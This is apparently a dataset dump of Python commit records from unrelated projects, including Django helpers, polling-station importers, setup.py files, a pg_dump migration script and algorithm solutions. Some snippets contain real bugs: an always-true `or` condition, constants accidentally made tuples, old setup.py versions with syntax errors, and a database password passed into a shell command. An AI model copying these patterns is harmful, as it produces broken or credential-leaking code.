from django.shortcuts import render_to_response
from django.template import loader, Context, RequestContext
from django.core.urlresolvers import reverse
from pages import settings
def get_request_mock():
"""Build a request mock that can be used for testing."""
bh = BaseHandler()
bh.load_middleware()
request = WSGIRequest({
'REQUEST_METHOD': 'GET',
'SERVER_NAME': 'test',
'SERVER_PORT': '8000',
})
# Apply request middleware
for middleware_method in bh._request_middleware:
# LocaleMiddleware should never be applied a second time because
# it would broke the current real request language
if 'LocaleMiddleware' not in str(middleware_method.im_class):
response = middleware_method(request)
return request
class AutoRenderHttpError(Exception):
"""Cannot return context dictionary because a view returned an HTTP
response when a (template_name, context) tuple was expected."""
pass
def auto_render(func):
"""
This view decorator automatically calls the ``render_to_response``
shortcut. A view that use this decorator should return a tuple of this
form : (template name, context) instead of a ``HttpRequest`` object.
"""
def _dec(request, *args, **kwargs):
template_override = kwargs.pop('template_name', None)
only_context = kwargs.pop('only_context', False)
if only_context:
# return only context dictionary
response = func(request, *args, **kwargs)
if isinstance(response, HttpResponse):
raise AutoRenderHttpError
(template_name, context) = response
return context
response = func(request, *args, **kwargs)
if isinstance(response, HttpResponse):
return response
(template_name, context) = response
t = context['template_name'] = template_override or template_name
return render_to_response(t, context,
context_instance=RequestContext(request))
return _dec
def get_slug_and_relative_path(path):
"""Return the page's slug and relative path."""
root = reverse('pages-root')
if path.startswith(root):
path = path[len(root):]
if len(path) and path[-1] == '/':
path = path[:-1]
slug = path.split("/")[-1]
lang = None
if settings.PAGE_USE_LANGUAGE_PREFIX:
lang = path.split("/")[0]
path = path[(len(lang) + 1):]
return slug, path, lang
def get_template_from_request(request, page=None):
"""
Gets a valid template from different sources or falls back to the
default template.
"""
if settings.PAGE_TEMPLATES is None:
return settings.DEFAULT_PAGE_TEMPLATE
template = request.REQUEST.get('template', None)
if template is not None and \
(template in dict(settings.PAGE_TEMPLATES).keys() or
template == settings.DEFAULT_PAGE_TEMPLATE):
return template
if page is not None:
return page.get_template()
return settings.DEFAULT_PAGE_TEMPLATE
def get_language_from_request(request):
"""Return the most obvious language according the request."""
language = request.GET.get('language', None)
if language:
return language
if hasattr(request, 'LANGUAGE_CODE'):
return settings.PAGE_LANGUAGE_MAPPING(str(request.LANGUAGE_CODE))
else:
return settings.PAGE_DEFAULT_LANGUAGE
| Python | 0 |
99f454b3fa62cffac922a7b3431e0024e6dfde3d | add data migration script | dataactcore/scripts/migrateDataBroker.py | dataactcore/scripts/migrateDataBroker.py | # migrate data using pg_dump and pg_restore
# data copied from tables:
# error_data:
# error_metadata
# file
# job_tracker:
# job
# submission
# job_dependency
# user_manager;
# users
# email_token
# validator:
# appropriation
# award_financial
# award_financial_assistance
# object_class_program_activity
# run on command line: python migrateDataBroker.py
from dataactcore.config import CONFIG_DB
import subprocess
c = 'postgresql://{}:{}@{}/'.format(
CONFIG_DB['username'], CONFIG_DB['password'], CONFIG_DB['host'])
target = '{}data_broker'.format(c)
# error_data
db = 'error_data'
source = '{}{}'.format(c, db)
print('migrating {}'.format(db))
cmd = 'pg_dump -d {} -t error_metadata -t file --data-only --format=c | ' \
'pg_restore -d {} --data-only'.format(source, target)
p = subprocess.call(cmd, shell=True, stdout=subprocess.PIPE)
print('return code = {}\n'.format(p))
# job_tracker
db = 'job_tracker'
source = '{}{}'.format(c, db)
print('migrating {}'.format(db))
cmd = 'pg_dump -d {} -t job_dependency -t job -t submission --data-only --format=c | ' \
'pg_restore -d {} --data-only'.format(source, target)
p = subprocess.call(cmd, shell=True, stdout=subprocess.PIPE)
print('return code = {}\n'.format(p))
# user_manager
db = 'user_manager'
source = '{}{}'.format(c, db)
print('migrating {}'.format(db))
cmd = 'pg_dump -d {} -t users -t email_token --data-only --format=c | ' \
'pg_restore -d {} --data-only'.format(source, target)
p = subprocess.call(cmd, shell=True, stdout=subprocess.PIPE)
print('return code = {}\n'.format(p))
# validation - these tables are larger, so do individually
db = 'validation'
source = '{}{}'.format(c, db)
tables = ['appropriation', 'object_class_program_activity',
'award_financial', 'award_financial_assistance']
for t in tables:
print('migrating {}: {}'.format(db, t))
cmd = 'pg_dump -d {} -t {} --data-only --format=c | ' \
'pg_restore -d {} --data-only'.format(source, t, target)
p = subprocess.call(cmd, shell=True, stdout=subprocess.PIPE)
print('return code = {}\n'.format(p))
| Python | 0.000001 | |
17bbd6d44ec7edd1a079b12a44c283a358b11b92 | add import script for Teignbridge (closes #865) | polling_stations/apps/data_collection/management/commands/import_teignbridge.py | polling_stations/apps/data_collection/management/commands/import_teignbridge.py | from data_collection.management.commands import BaseXpressDemocracyClubCsvImporter
class Command(BaseXpressDemocracyClubCsvImporter):
council_id = 'E07000045'
addresses_name = 'parl.2017-06-08/Version 1/Democracy_Club__08June2017.tsv'
stations_name = 'parl.2017-06-08/Version 1/Democracy_Club__08June2017.tsv'
elections = ['parl.2017-06-08']
csv_delimiter = '\t'
| Python | 0 | |
c750cbb65541ea32c2f8904c394469a14fa1e82b | add import script for West Dorset | polling_stations/apps/data_collection/management/commands/import_west_dorset.py | polling_stations/apps/data_collection/management/commands/import_west_dorset.py | from data_collection.management.commands import BaseXpressDCCsvInconsistentPostcodesImporter
class Command(BaseXpressDCCsvInconsistentPostcodesImporter):
council_id = 'E07000052'
addresses_name = 'parl.2017-06-08/Version 1/Democracy_Club__08June2017WDDC.TSV'
stations_name = 'parl.2017-06-08/Version 1/Democracy_Club__08June2017WDDC.TSV'
elections = ['parl.2017-06-08']
csv_delimiter = '\t'
station_postcode_search_fields = [
'polling_place_postcode',
'polling_place_address_4',
'polling_place_address_3',
'polling_place_address_2',
'polling_place_address_1',
]
| Python | 0 | |
3e4ed4d6624ac0db7838e9aeb7a98710f746b2b8 | Create solution.py | hackerrank/algorithms/strings/easy/mars_exploration/py/solution.py | hackerrank/algorithms/strings/easy/mars_exploration/py/solution.py | #!/bin/python3
import sys
def solution(signal):
import itertools
count = 0
for expected, received in zip(itertools.cycle('SOS'), signal):
if expected != received:
count += 1
return count
signal = input().strip()
count = solution(signal)
print(count)
| Python | 0.000018 | |
eb9eb8fd295d8dbba66267e7551f4e6a51687797 | Set db starting point. | snippets/base/migrations/0062_set_asrsnippet_id_autoincrement_starting_point.py | snippets/base/migrations/0062_set_asrsnippet_id_autoincrement_starting_point.py | # Generated by Django 2.1.3 on 2018-11-16 12:30
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('base', '0061_auto_20181116_0810'),
]
operations = [
migrations.RunSQL(['ALTER TABLE base_asrsnippet AUTO_INCREMENT=10500;'], [''])
]
| Python | 0 | |
68e10dcb52f17aca1482112816062ea15e40097b | Create viruscheck.py | viruscheck.py | viruscheck.py | #!/usr/bin/env python
#Requires ClamAV to be installed
import sys
import subprocess
def clamscan():
scan = subprocess.check_output([
'clamscan',
'-r',
starting_dir
])
print scan
starting_dir = sys.argv[1]
print "Running scan.........."
clamscan()
| Python | 0 | |
70e14187ecd2567894e5e8183341a63835d6839c | Create pldm related specific constants file. | data/pldm_variables.py | data/pldm_variables.py | #!/usr/bin/python
r"""
Contains PLDM-related constants.
"""
PLDM_TYPE_BASE = '00'
PLDM_TYPE_PLATFORM = '02'
PLDM_TYPE_BIOS = '03'
PLDM_TYPE_OEM = '3F'
PLDM_BASE_CMD = {
'GET_TID': '2',
'GET_PLDM_VERSION': '3',
'GET_PLDM_TYPES': '4',
'GET_PLDM_COMMANDS': '5'}
PLDM_SUCCESS = '00'
PLDM_ERROR = '01'
PLDM_ERROR_INVALID_DATA = '02'
PLDM_ERROR_INVALID_LENGTH = '03'
PLDM_ERROR_NOT_READY = '04'
PLDM_ERROR_UNSUPPORTED_PLDM_CMD = '05'
PLDM_ERROR_INVALID_PLDM_TYPE = '20'
BIOS_TABLE_UNAVAILABLE = '83',
INVALID_BIOS_TABLE_DATA_INTEGRITY_CHECK = '84',
INVALID_BIOS_TABLE_TYPE = '85'
PLDM_BIOS_CMD = {
'GET_BIOS_TABLE': '01',
'SET_BIOS_ATTRIBUTE_CURRENT_VALUE': '07',
'GET_BIOS_ATTRIBUTE_CURRENT_VALUE_BY_HANDLE': '08',
'GET_DATE_TIME': '0c'}
PLDM_PLATFORM_CMD = {
'SET_STATE_EFFECTER_STATES': '39',
'GET_PDR': '51'}
PLDM_PDR_TYPES = {
'STATE_EFFECTER_PDR': '11'}
# PLDM OEM related variables.
PLDM_FILEIO_CMD = {
'GET_FILE_TABLE': '1',
'READ_FILE': '4',
'WRITE_FILE': '5',
'READ_FILE_INTO_MEMORY': '6',
'WRITE_FILE_FROM_MEMORY': '7'}
PLDM_FILEIO_COMPLETION_CODES = {
'INVALID_FILE_HANDLE': '80',
'DATA_OUT_OF_RANGE': '81',
'INVALID_READ_LENGTH': '82',
'INVALID_WRITE_LENGTH': '83',
'FILE_TABLE_UNAVAILABLE': '84',
'INVALID_FILE_TABLE_TYPE': '85'}
| Python | 0 | |
f6a4b230d3ee98d906920c2e1cd671208a5b3e96 | Python 1.5.4 | python/jsbeautifier/__version__.py | python/jsbeautifier/__version__.py | __version__ = '1.5.4'
| __version__ = '1.5.3'
| Python | 0.998796 |
8ff3b74df83055068b1f8abe05e8ce186ab6eb18 | implement strStr with KMP. Kana我喜欢你啊!!! | python/string/ImplementstrStr.py | python/string/ImplementstrStr.py | #KMP algorithm. can't get it. Just a simple implementation of
#0. https://www.youtube.com/watch?v=2ogqPWJSftE
#and
#1. http://www.cnblogs.com/zuoyuan/p/3698900.html
class Solution:
# @param haystack, a string
# @param needle, a string
# @return an integer
def strStr(self, haystack, needle):
n = len(haystack)
m = len(needle)
if m == 0 or haystack == needle:
return 0
prefix = self.prefixMap(needle)
q = 0
for i in range(0, n):
while q > 0 and needle[q] != haystack[i]:
q = prefix[q - 1]
if needle[q] == haystack[i]:
q = q + 1
if q == m:
return i - m + 1
return -1
def prefixMap(self, needle):
prefix = [0 for i in xrange(len(needle))]
a = 0
for b in xrange(2, len(needle)+1):
while a > 0 and needle[a] != needle[b-1]:
a = prefix[a-1]
if needle[a] == needle[b-1]:
a += 1
prefix[b-1] = a
return prefix
if __name__ == "__main__":
solution = Solution()
print solution.strStr("mississippi", "pi")
print solution.strStr("a", "a")
| Python | 0 | |
8b42b0825d5cbb6becef9669b43a2c8229ea8642 | Add script to remove unpaired fasta entries. | remove_unpaired_fasta_entries.py | remove_unpaired_fasta_entries.py | #!/usr/bin/env python
"""
Remove unpaired reads from a fasta file.
This script can be used for the case that unpaired reads (e.g. as
reads were removed during quality trimming) in a pair of fasta files
from paired-end sequencing need to be removed.
"""
import argparse
from Bio import SeqIO
from Bio.SeqIO.FastaIO import FastaWriter
parser = argparse.ArgumentParser()
parser.add_argument("fasta_file_to_filter")
parser.add_argument("reference_fasta_file")
parser.add_argument("--output_fasta", default="output.fa")
args = parser.parse_args()
# Read reference file header
reference_headers = {}
for seq_record in SeqIO.parse(args.reference_fasta_file, "fasta"):
reference_headers[seq_record.id.split()[0]] = 1
# Read fasta file to filter and write output
with open(args.output_fasta, 'w') as output_fh:
writer = FastaWriter(output_fh, wrap=0)
writer.write_file(
filter(lambda seq_record: seq_record.id.split()[0] in reference_headers,
SeqIO.parse(args.fasta_file_to_filter, "fasta")))
| Python | 0 | |
dcea9761c47931bef23c60c26fc9de4c5370dfdd | Add collate_readmes | collate_readmes.py | collate_readmes.py | """Collate the README.md files of all repos generated from a template, into a single Markdown file
that contains a section for each repo.
Each individual README is prepended with a header that includes the GitHub login, as inferred from the name of the
generated repo. If the README already begins with a header, the login is appended, or substituted if the header is
simply "About Me".
If a file Roster.csv with columns "GitHub Login", "Preferred Name", and "Last Name" is present in the current directory,
these names are used instead of the GitHub login.
Usage:
python collate_readmes.py
python collate_readmes.py | pandoc --from markdown --metadata pagetitle="About Me" -s -o about.html
"""
from datetime import datetime
from dateutil import tz
import re
import sys
import json
import os
import subprocess
from pathlib import Path
from string import Template
import numpy as np
import pandas as pd
from graphqlclient import GraphQLClient
def get_git_config(name):
result = subprocess.run(
"git config".split() + [name], capture_output=True, text=True
)
if result.returncode:
raise Exception(result.stderr.strip())
return result.stdout.rstrip()
GITHUB_ACCESS_TOKEN = os.environ.get("GITHUB_ACCESS_TOKEN") or get_git_config(
"user.accesstoken"
)
GH_CLIENT = GraphQLClient("https://api.github.com/graphql")
GH_CLIENT.inject_token(f"token {GITHUB_ACCESS_TOKEN}")
def query(gql, variables=None):
"""Perform a GraphQL query, with error detection and variable substition."""
variables = variables or {}
q = Template(gql).substitute(**{k: json.dumps(v) for k, v in variables.items()})
result = json.loads(GH_CLIENT.execute(q, variables))
if "errors" in result:
# TODO include err['locations'] = {'line', 'column'}
raise Exception("\n".join(err["message"] for err in result["errors"]))
return result["data"]
ORG_REPOS_GQL = """
query {
organization(login: $organization_login) {
repositories(first: 100, after: $cursor) {
nodes {
name
nameWithOwner
readme: object(expression: "master:README.md") {
... on Blob {
text
}
}
templateRepository {
nameWithOwner
}
ref(qualifiedName: "master") {
target {
... on Commit {
history(first: 100) {
edges {
node {
oid
authoredDate
committedDate
pushedDate
author {
name
email
date
}
}
}
}
}
}
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
"""
def get_generated_repos(name_with_owner):
org_login = name_with_owner.split("/")[0]
cursor = None
repos = []
while True:
variables = {"organization_login": org_login, "cursor": cursor}
result = query(ORG_REPOS_GQL, variables)
repos += result["organization"]["repositories"]["nodes"]
pageInfo = result["organization"]["repositories"]["pageInfo"]
if not pageInfo["hasNextPage"]:
break
cursor = pageInfo["endCursor"]
master = next(r for r in repos if r["nameWithOwner"] == name_with_owner)
forks = [
r
for r in repos
if r["templateRepository"]
and r["templateRepository"]["nameWithOwner"] == name_with_owner
]
return master, forks
def longest_prefix(names):
"""Find the longest common prefix of the repository names."""
return next(
names[0][:n]
for n in range(min(len(s) for s in names), 0, -1)
if len({s[:n] for s in names}) == 1
)
def annotate_repos(repos, roster):
"""Annotate repo['login'] with the login of the student who generated the repo
Find the longest common prefix of the repository names.
"""
common_prefix = longest_prefix([r["name"] for r in repos])
for r in repos:
login = r["name"][len(common_prefix) :]
r["login"] = login
r["author"] = roster.get(login, login)
# Annotate repo['commits'] with commits that Christian didn't author
r["commits"] = [
c["node"]
for c in r["ref"]["target"]["history"]["edges"]
if c["node"]["author"]["email"] != "christian@nyu.edu"
]
def read_roster():
# Set login_names to a dict login -> name
roster_path = Path("Roster.csv")
if not roster_path.exists():
return {}
roster = pd.read_csv(roster_path)
column_first_names = ["Preferred", "English", "First"]
first_names = next(
(roster[name] for name in column_first_names if name in roster), None
)
names = first_names + " " + roster["Last"]
login_names = {
login: name
for login, name in zip(roster["GitHub Login"], names)
if isinstance(name, str)
}
return login_names
def is_late_commit(commit):
return commit["author"]["date"] > "2019-09-09T03:00:00+08:00"
def print_late_commits(repos):
# Show repos that were turned in late or not at all
# report missing and late assignments
warnings = {
"No commits": [r for r in repos if not r["commits"]],
"Late": [r for r in repos if all(map(is_late_commit, r["commits"]))],
"Some late commits": [
r for r in repos if any(map(is_late_commit, r["commits"]))
],
}
# only reported
reported = []
for label, rs in warnings.items():
rs = [r for r in rs if r not in reported]
reported += rs
if rs:
print(f"{label}: {', '.join(sorted(r['login'] for r in rs))}")
for r in repos:
commits = [c for c in r["commits"] if is_late_commit(c)]
if not commits:
continue
print(f" {r['login']}:")
timestamps = {c["author"]["date"] for c in commits}
for ts in timestamps:
dt = (
datetime.fromisoformat(ts)
.astimezone(tz.gettz("China"))
.strftime("%H:%M %a, %b %-d")
)
print(f" {dt}")
def increment_headings(markdown):
"""Increment all the heading levels of a markdown string, if it contains level-one heading.
This also normalizes heading lines "#\s*title" -> "# title"
Note: this doesn't know not to look in fenced blocks
"""
# Normalize the '## ' spacing
markdown = re.sub(r"^(#+)\s*", r"\1 ", markdown, 0, re.M)
# If there's an H1, increment all the Hn's
if re.compile(r"^# ", re.M).search(markdown):
markdown = re.sub(r"^(#+)", r"\1# ", markdown, 0, re.M)
return markdown
def print_collated_readme(repos):
# print collated readme
for r in repos:
name = r["author"]
title, about = None, r["readme"]["text"].strip()
if about.startswith("# "):
title, about = about.split("\n", 1)
if not title or title == "# About Me":
title = "# " + name
if name not in title:
title += f" ({name})"
print(increment_headings(title + "\n" + about))
print("\n---\n")
def main():
master, repos = get_generated_repos("application-lab/1-WELCOME-TO-APPLAB")
annotate_repos(repos, read_roster())
repos = [r for r in repos if r["commits"]]
repos.sort(key=lambda r: r["author"])
if False:
print_late_commits(repos)
if True: # print collated readme
print_collated_readme(repos)
if __name__ == "__main__":
main()
| Python | 0.000003 | |
b84af881f800bfad13b5e90379c5f4ec0445239a | Add setup.py. | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup
setup(name = 'pymoira',
version = '1.0',
description = 'Client library for MIT Moira service managment system protocol',
author = 'Victor Vasiliev',
author_email = 'vasilvv@mit.edu',
url = 'https://github.com/vasilvv/pymoira',
license = 'MIT',
py_modules = ['pymoira'])
| Python | 0 | |
52d3a5a20c7f1bf4c874e4210fd17753a67d5c71 | Add ID command | commands/cmd_id.py | commands/cmd_id.py | from lib.command import Command
class IdCommand(Command):
name = 'id'
description = 'Returns your user ID, or the ID of the current chat when -c or \'chat\' is passed as an argument.'
def run(self, message, args):
reply = 'Your Telegram ID is {0}'.format(message.from_user.id)
if '-c' or 'chat' in args:
reply = 'This chat\'s ID is {0}'.format(message.chat.id)
self.reply(message, reply)
| Python | 0.000012 | |
9bc26f8a0d2c209fc3e73cd0f267164bfd49fef3 | Update setup.py | setup.py | setup.py | #!/usr/bin/env python2
from distutils.core import setup
from wok import version
setup(
name='wok',
version=version.encode("utf8"),
author='Mike Cooper',
author_email='mythmon@gmail.com',
url='http://wok.mythmon.com',
description='Static site generator',
long_description=
"Wok is a static website generator. It turns a pile of templates, "
"content, and resources (like CSS and images) into a neat stack of "
"plain HTML. You run it on your local computer, and it generates a "
"directory of web files that you can upload to your web server, or "
"serve directly."
download_url="http://wok.mythmon.com/download",
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: MIT License",
'Operating System :: POSIX',
'Programming Language :: Python',
]
requires=['pyyaml', 'jinja2', 'Markdown', 'docutils', 'Pygments'],
packages=['wok'],
scripts=['scripts/wok'],
)
| #!/usr/bin/env python2
from distutils.core import setup
from wok import version
setup(name='wok',
version=version.encode("utf8"),
description='Static site generator',
install_requires=['pyyaml', 'jinja2'],
author='Mike Cooper',
author_email='mythmon@gmail.com',
url='https://www.github.com/mythmon/wok',
packages=['wok'],
scripts=['scripts/wok'],
)
| Python | 0.000001 |
8238e0476097af0afed1443391370285dd61d8ca | Add setup.py | setup.py | setup.py | #!/usr/bin/env python
import setuptools
import os
with open(os.path.join('fs', 'sshfs', '__metadata__.py')) as f:
exec(f.read())
CLASSIFIERS = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: System :: Filesystems',
]
with open('README.rst', 'rt') as f:
DESCRIPTION = f.read()
with open('requirements.txt') as f:
REQUIREMENTS = f.read().splitlines()
with open(os.path.join('tests', 'requirements.txt')) as f:
TEST_REQUIREMENTS = [l for l in f if not l.startswith('-r')]
TEST_REQUIREMENTS.extend(REQUIREMENTS)
setuptools.setup(
author=__author__,
author_email=__author_email__,
classifiers=CLASSIFIERS,
description="Pyfilesystem2 implementation for SSH/SFTP using paramiko ",
install_requires=REQUIREMENTS,
license=__license__,
long_description=DESCRIPTION,
name='fs.sshfs',
packages=setuptools.find_packages(exclude=("tests",)),
platforms=['any'],
test_suite="tests",
tests_require=TEST_REQUIREMENTS,
url="https://github.com/althonos/fs.sshfs",
version=__version__,
)
| Python | 0.000001 | |
72416d5bf4308c10bc9b2ab31464ad2853042402 | Use the official package django select2 that finally support py3 | setup.py | setup.py | #!/usr/bin/env python
"""
Installation script:
To release a new version to PyPi:
- Ensure the version is correctly set in accounting.__init__.py
- Run:
`python setup.py sdist`
`twine upload dist/*`
"""
from setuptools import setup, find_packages
import os
import sys
from accounting import get_version
PROJECT_DIR = os.path.dirname(__file__)
setup(name='django-accounting',
version=get_version().replace(' ', '-'),
url='https://github.com/dulaccc/django-accounting',
author="Pierre Dulac",
author_email="pierre@dulaccc.me",
description="Accounting made accessible for small businesses and "
"sole proprietorships through a simple Django project",
long_description=open(os.path.join(PROJECT_DIR, 'README.rst')).read(),
keywords="Accounting, Django, Money, Cashflow",
license='MIT',
platforms=['linux'],
packages=find_packages(exclude=["tests*"]),
include_package_data=True,
install_requires=[
'django>=1.7.0,<1.8',
# Used to render the forms
'django-bootstrap3==4.11.0',
# Used to improve the forms
'Django_Select2_Py3>=4.2.1',
# Used for date/time form fields
'django-datetime-widget>=0.9,<1.0',
# Define beautiful tags
'django-classy-tags==0.5.1',
# Internationalization
'Babel>=1.0,<1.4',
# Date utilities
'python-dateutil>=2.2,<2.3',
# Select2
'django-select2>=4.3,<4.4',
],
# See http://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: Unix',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Software Development :: Libraries :: Application Frameworks']
)
| #!/usr/bin/env python
"""
Installation script:
To release a new version to PyPi:
- Ensure the version is correctly set in accounting.__init__.py
- Run:
`python setup.py sdist`
`twine upload dist/*`
"""
from setuptools import setup, find_packages
import os
import sys
from accounting import get_version
PROJECT_DIR = os.path.dirname(__file__)
setup(name='django-accounting',
version=get_version().replace(' ', '-'),
url='https://github.com/dulaccc/django-accounting',
author="Pierre Dulac",
author_email="pierre@dulaccc.me",
description="Accounting made accessible for small businesses and "
"sole proprietorships through a simple Django project",
long_description=open(os.path.join(PROJECT_DIR, 'README.rst')).read(),
keywords="Accounting, Django, Money, Cashflow",
license='MIT',
platforms=['linux'],
packages=find_packages(exclude=["tests*"]),
include_package_data=True,
install_requires=[
'django>=1.7.0,<1.8',
# Used to render the forms
'django-bootstrap3==4.11.0',
# Used to improve the forms
'Django_Select2_Py3>=4.2.1',
# Used for date/time form fields
'django-datetime-widget>=0.9,<1.0',
# Define beautiful tags
'django-classy-tags==0.5.1',
# Internationalization
'Babel>=1.0,<1.4',
# Date utilities
'python-dateutil>=2.2,<2.3',
],
dependency_links=[
'http://github.com/applegrew/django-select2@python3#egg=Django_Select2_Py3-4.2.1',
],
# See http://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: Unix',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Software Development :: Libraries :: Application Frameworks']
)
| Python | 0.000001 |
a79fcf2786df38f84b065ff579f83f03c1d5a20b | Add setup.py file | setup.py | setup.py | #!/usr/bin/env python
from setuptools import setup, find_packages
setup(
name='django-cyclebufferfield',
description="Field to manage Django fields in a fixed-size ring buffer.",
version='0.1',
url='http://code.playfire.com/',
author='Playfire.com',
author_email='tech@playfire.com',
license='BSD',
packages=find_packages(),
)
| Python | 0.000001 | |
5d6f52d2b89eda2aa070faafad2fd89eeaf599ec | add setup py | setup.py | setup.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
setup(
name='selectel_cloud_api',
version='1.0',
packages=find_packages(),
install_requires='selectel_cloud_api',
url='https://github.com/RustoriaRu/SelectelCloudApi',
license='MIT',
author='vir-mir',
keywords='selectel.ru selectel api, cloud',
author_email='virmir49@gmail.com',
description='api select cloud api',
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Software Development :: Libraries :: Python Modules',
]
)
| Python | 0 | |
ab3728405be94c071c353374735b97f207479c00 | Add setup.py to make an .exe with py2exe | setup.py | setup.py | #!/c/Anaconda/python
from distutils.core import setup
import py2exe
setup(console=["tmpr.py"])
| Python | 0.000001 | |
2e91c826a72e3f240f6d010678d68bab0bab5749 | Add setup.py for packaging | setup.py | setup.py | from setuptools import setup
from sirsi import __version__, __author__
setup(
name='sirsi',
version=__version__,
author=__author__,
author_email='winston@ml1.net',
description='Manage a sirsi enterprise-based library account',
url='https://github.com/-winny/sirsi',
license='MIT',
packages=['sirsi'],
install_requires=[
'argparse==1.2.1',
'beautifulsoup4==4.3.2',
'mechanize==0.2.5',
'python-dateutil==2.2',
'tabulate==0.7.2',
],
)
| Python | 0 | |
76601be760f0aa15637f65164c5e595b218fc2b9 | Add setup.py | setup.py | setup.py | from setuptools import find_packages
from setuptools import setup
VERSION = '0.0.1'
setup(
name='gae-utils',
version=VERSION,
packages=find_packages(),
install_requires=[],
include_package_data=True,
zip_safe=False,
maintainer='Tyler Treat',
maintainer_email='ttreat31@gmail.com'
)
| Python | 0.000001 | |
609bc6fbd1284c1b769c2e0548f6c65a97d144cd | Add initial attempt at a setup.py file | setup.py | setup.py | from setuptools import setup
import pygametemplate
setup(
name="pygametemplate",
version=pygametemplate.__version__,
description=pygametemplate.__doc__,
url="https://github.com/AndyDeany/pygame-template",
author=pygametemplate.__author__,
author_email="oneandydean@hotmail.com",
packages=["pygametemplate"]
)
| Python | 0.000001 | |
b5b503229789c61af5bb47d6bb587bafb2ada562 | Fix setup.py, bump version. | setup.py | setup.py | #!/usr/bin/env python
"""
# pykafka
pykafka allows you to produce messages to the Kafka distributed publish/subscribe messaging service.
## Requirements
You need to have access to your Kafka instance and be able to connect through
TCP. You can obtain a copy and instructions on how to setup kafka at
https://github.com/kafka-dev/kafka
## Installation
pip install pykafka
## Usage
### Sending a simple message
import kafka
producer = kafka.producer.Producer('test')
message = kafka.message.Message("Foo!")
producer.send(message)
### Sending a sequence of messages
import kafka
producer = kafka.producer.Producer('test')
message1 = kafka.message.Message("Foo!")
message2 = kafka.message.Message("Bar!")
producer.send([message1, message2])
### Batching a bunch of messages using a context manager.
import kafka
producer = kafka.producer.Producer('test')
with producer.batch() as messages:
print "Batching a send of multiple messages.."
messages.append(kafka.message.Message("first message to send")
messages.append(kafka.message.Message("second message to send")
* they will be sent all at once, after the context manager execution.
### Consuming messages one by one
import kafka
consumer = kafka.consumer.Consumer('test')
messages = consumer.consume()
### Consuming messages using a generator loop
import kafka
consumer = kafka.consumer.Consumer('test')
for message in consumer.loop():
print message
Contact:
Please use the GitHub issues: https://github.com/dsully/pykafka/issues
* Inspiried from Alejandro Crosa's kafka-rb: https://github.com/acrosa/kafka-rb
"""
import setuptools
# Don't install deps for development mode.
setuptools.bootstrap_install_from = None
setuptools.setup(
name = 'pykafka',
version = '0.1.1',
license = 'MIT',
long_description = __doc__,
author = "Dan Sully",
author_email = "dsully@gmail.com",
url = 'http://github.com/dsully/pykafka',
platforms = 'any',
# What are we packaging up?
packages = setuptools.find_packages('kafka'),
zip_safe = True,
verbose = False,
)
| #!/usr/bin/env python
"""
# pykafka
pykafka allows you to produce messages to the Kafka distributed publish/subscribe messaging service.
## Requirements
You need to have access to your Kafka instance and be able to connect through
TCP. You can obtain a copy and instructions on how to setup kafka at
https://github.com/kafka-dev/kafka
## Installation
pip install pykafka
## Usage
### Sending a simple message
import kafka
producer = kafka.producer.Producer('test')
message = kafka.message.Message("Foo!")
producer.send(message)
### Sending a sequence of messages
import kafka
producer = kafka.producer.Producer('test')
message1 = kafka.message.Message("Foo!")
message2 = kafka.message.Message("Bar!")
producer.send([message1, message2])
### Batching a bunch of messages using a context manager.
import kafka
producer = kafka.producer.Producer('test')
with producer.batch() as messages:
print "Batching a send of multiple messages.."
messages.append(kafka.message.Message("first message to send")
messages.append(kafka.message.Message("second message to send")
* they will be sent all at once, after the context manager execution.
### Consuming messages one by one
import kafka
consumer = kafka.consumer.Consumer('test')
messages = consumer.consume()
### Consuming messages using a generator loop
import kafka
consumer = kafka.consumer.Consumer('test')
for message in consumer.loop():
print message
Contact:
Please use the GitHub issues: https://github.com/dsully/pykafka/issues
* Inspiried from Alejandro Crosa's kafka-rb: https://github.com/acrosa/kafka-rb
"""
import setuptools
# Don't install deps for development mode.
setuptools.bootstrap_install_from = None
setuptools.setup(
name = 'pykafka',
version = '0.1',
license = 'MIT',
long_description = __doc__
author = "Dan Sully",
author_email = "dsully@gmail.com",
url = 'http://github.com/dsully/pykafka',
platforms = 'any',
# What are we packaging up?
packages = setuptools.find_packages('kafka'),
zip_safe = True,
verbose = False,
)
| Python | 0 |
a1e35b73b5e10a885e78e965242c5b1b6e92aa16 | Add a setup.py file | setup.py | setup.py | from setuptools import setup
setup(
name='wellknown',
version='0.1dev',
packages=['wellknown']
)
| Python | 0.000002 | |
65ecc0145406e7d8e20a281c0e5c04b26208646d | Add a setup.py file. | setup.py | setup.py | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
config = {
'name': 'ultracold-ions',
'description': 'A library for the simulation of ultracold neutral plasmas.',
'author': 'Tech-X Corporation',
'url': 'https://github.com/Tech-XCorp/ultracold-ions',
'download_url': 'https://github.com/Tech-XCorp/ultracold-ions',
'author_email': 'dmeiser@txcorp.com',
'version': '0.1',
'install_requires': ['numpy','pyopencl','nose'],
'packages': ['uci'],
'scripts': []
}
setup(**config)
| Python | 0 | |
